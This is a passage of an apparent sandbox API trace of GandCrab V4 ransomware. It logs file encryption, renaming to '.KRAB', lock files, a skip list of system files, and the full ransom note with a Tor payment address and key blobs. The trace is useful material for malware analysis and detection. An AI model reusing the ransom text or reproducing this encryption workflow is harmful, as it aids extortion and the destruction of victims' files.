pdwDataLen=0x338f3a8, dwFlags=0x0 | out: pbData=0x338f3a4*=0x800, pdwDataLen=0x338f3a8*=0x4) returned 1 [0100.733] CryptEncrypt (in: hKey=0xfbdae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f3dc*=0x100) returned 1 [0100.733] GetLastError () returned 0x0 [0100.733] CryptDestroyKey (hKey=0xfbdae0) returned 1 [0100.733] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0100.733] CreateFileW (lpFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.734] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0100.734] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0100.734] ReadFile (in: hFile=0x320, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f47c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f47c*=0x80000, lpOverlapped=0x0) returned 1 [0100.810] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0xfff80000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.810] WriteFile (in: hFile=0x320, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f478*=0x80000, lpOverlapped=0x0) returned 1 [0100.811] WriteFile (in: hFile=0x320, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f478, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f478*=0x208, lpOverlapped=0x0) returned 1 [0100.812] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.816] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.818] CloseHandle (hObject=0x320) returned 1 [0100.818] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.818] MoveFileW (lpExistingFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="C:\\Users\\Default\\NTUSER.DAT{77a2c7ed-26f0-11e5-80da-e41d2d741090}.TMContainer00000000000000000002.regtrans-ms.KRAB" (normalized: "c:\\users\\default\\ntuser.dat{77a2c7ed-26f0-11e5-80da-e41d2d741090}.tmcontainer00000000000000000002.regtrans-ms.krab")) returned 1 [0100.824] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.824] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.824] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0100.824] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0100.824] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Pictures" | out: lpString1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0100.824] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Pictures\\") returned="C:\\Users\\Default\\Pictures\\" [0100.824] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.825] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.825] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.825] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.825] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.825] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.825] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.826] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Pictures\\\\KRAB-DECRYPT.txt") returned 43 [0100.826] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\pictures\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0100.826] GetLastError () returned 0x50 [0100.826] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.827] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.827] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x1e)) [0100.827] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.827] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.827] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.828] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Pictures\\d2ca4a08d2ca4dee3d.lock") returned 49 [0100.828] CreateFileW (lpFileName="C:\\Users\\Default\\Pictures\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\pictures\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.828] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.828] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.829] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\") returned 26 [0100.829] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Pictures\\*") returned="C:\\Users\\Default\\Pictures\\*" [0100.829] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbdae0 [0100.829] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0100.829] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.829] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0100.829] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0100.829] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.829] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0100.829] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0100.829] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\Default\\Pictures\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\Default\\Pictures\\d2ca4a08d2ca4dee3d.lock" [0100.829] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.830] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Pictures\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 54 [0100.830] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\d2ca4a08d2ca4dee3d.lock") returned 49 [0100.830] lstrlenW (lpString=".lock") returned 5 [0100.830] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.830] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0100.830] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.830] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.831] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0100.831] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0100.831] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0100.831] lstrcatW (in: lpString1="C:\\Users\\Default\\Pictures\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Pictures\\KRAB-DECRYPT.txt") returned="C:\\Users\\Default\\Pictures\\KRAB-DECRYPT.txt" [0100.831] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.831] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\Default\\Pictures\\KRAB-DECRYPT.txt.KRAB") returned 47 [0100.831] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\KRAB-DECRYPT.txt") returned 42 [0100.831] lstrlenW (lpString=".txt") returned 4 [0100.831] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.832] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0100.832] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.832] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\KRAB-DECRYPT.txt") returned 42 [0100.832] lstrlenW (lpString="C:\\Users\\Default\\Pictures\\KRAB-DECRYPT.txt") returned 42 [0100.832] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0100.832] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0100.832] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0100.832] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0100.832] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0100.832] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0100.832] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0100.832] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0100.832] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0100.832] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0100.832] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.833] FindNextFileW (in: hFindFile=0xfbdae0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0 [0100.833] FindClose (in: hFindFile=0xfbdae0 | out: hFindFile=0xfbdae0) returned 1 [0100.833] CloseHandle (hObject=0x320) returned 1 [0100.833] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.833] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0100.833] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0100.833] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="PrintHood" | out: lpString1="C:\\Users\\Default\\PrintHood") returned="C:\\Users\\Default\\PrintHood" [0100.833] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood", lpString2="\\" | out: lpString1="C:\\Users\\Default\\PrintHood\\") returned="C:\\Users\\Default\\PrintHood\\" [0100.833] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.834] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.834] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.834] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.834] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.834] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.834] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.835] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\PrintHood\\\\KRAB-DECRYPT.txt") returned 44 [0100.835] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\printhood\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.836] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0100.836] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0100.836] CloseHandle (hObject=0x320) returned 1 [0100.837] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.837] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.840] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x30, wMilliseconds=0x2c)) [0100.840] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0100.840] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0100.840] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0100.841] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\PrintHood\\d2ca4a08d2ca4dee3d.lock") returned 50 [0100.841] CreateFileW (lpFileName="C:\\Users\\Default\\PrintHood\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\default\\printhood\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0100.842] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.842] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.843] lstrlenW (lpString="C:\\Users\\Default\\PrintHood\\") returned 27 [0100.843] lstrcatW (in: lpString1="C:\\Users\\Default\\PrintHood\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\PrintHood\\*") returned="C:\\Users\\Default\\PrintHood\\*" [0100.843] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xffffffff [0100.843] CloseHandle (hObject=0x320) returned 1 [0100.843] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0100.843] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0100.843] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0100.843] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Recent" | out: lpString1="C:\\Users\\Default\\Recent") returned="C:\\Users\\Default\\Recent" [0100.843] lstrcatW (in: lpString1="C:\\Users\\Default\\Recent", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Recent\\") returned="C:\\Users\\Default\\Recent\\" [0100.843] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0100.844] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0100.844] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0100.844] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0100.844] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0100.844] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0100.844] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0100.845] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Recent\\\\KRAB-DECRYPT.txt") returned 41 [0100.845] CreateFileW (lpFileName="C:\\Users\\Default\\Recent\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\default\\recent\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0100.846] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZI